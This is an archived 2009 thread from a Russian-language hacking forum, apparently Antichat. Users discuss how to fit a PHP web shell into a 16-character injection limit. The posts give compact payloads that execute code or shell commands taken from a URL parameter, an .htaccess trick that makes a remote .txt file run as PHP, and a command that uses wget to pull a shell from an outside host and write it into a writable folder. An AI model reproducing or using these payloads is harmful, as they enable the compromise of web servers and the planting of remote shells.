ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.07.2009, 21:19
|
|
Новичок
Регистрация: 20.09.2008
Сообщений: 3
Провел на форуме:
42073
Репутация:
0
|
|
<?eval($_GET[a])?> получается больше 16-ти символов, а
<?eval($a)?> и <?include($a)?> ничо не инклудят, ни локальные файлы ни с других хостов. (в адр строку добавляю &a=mysite.ru/file.txt)
Это значит конец? 16 символов мало  |
|
|
09.07.2009, 07:23
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Mr.Hardwar
<?eval($_GET[a])?> получается больше 16-ти символов, а
<?eval($a)?> и <?include($a)?> ничо не инклудят, ни локальные файлы ни с других хостов. (в адр строку добавляю &a= mysite.ru/file.txt)
Это значит конец? 16 символов мало http://mysite.ru/file.txt
По твоему запросу он инклюдит папку mysite.ru/file.txt а не удалённый сервер 
|
|
|
|
09.07.2009, 09:58
|
|
Новичок
Регистрация: 20.09.2008
Сообщений: 3
Провел на форуме:
42073
Репутация:
0
|
|
c http результат тот же(
&a=http://mysite.ru/primer.php -выводится страница c Hacking attempt!
&a=http://mysite.ru/primer.txt -страница грузится но ничо не инклудится..пишется "Привет, !"
Последний раз редактировалось Mr.Hardwar; 09.07.2009 в 10:04..
|
|
|
|
09.07.2009, 19:41
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Инклюдить он заинклюдить
Ну вот может бред.
в .htacces
AddType application/x-httpd-php .txt
На своём серваке. |
|
|
|
09.07.2009, 19:55
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
8 байт <? `$a`;
14 байт <? `$_GET[a]`;
|
|
|
|
09.07.2009, 22:02
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Сообщение от BlackSun
8 байт <? `$a`;
14 байт <? `$_GET[a]`;
Я тоже вчера пробовал... а дальше чего?
|
|
|
|
09.07.2009, 22:11
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Сообщение от Ch3ck
Я тоже вчера пробовал... а дальше чего? Что значит "а дальше чего"? Дальше сливаем wget'ом и ему подобными шелл, наслаждаемся.
?a=wget+http://google.com/shell.txt если уж совсем не понятно.
|
|
|
|
20.07.2009, 06:18
|
|
Постоянный
Регистрация: 13.10.2007
Сообщений: 347
Провел на форуме:
1345617
Репутация:
115
|
|
хм.... а ничего если упапки нет прав на запись???? =))))
|
|
|
|
20.07.2009, 07:13
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
А тебя совершенно не волнует тот факт, что папок все же больше одной? --output-document=
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
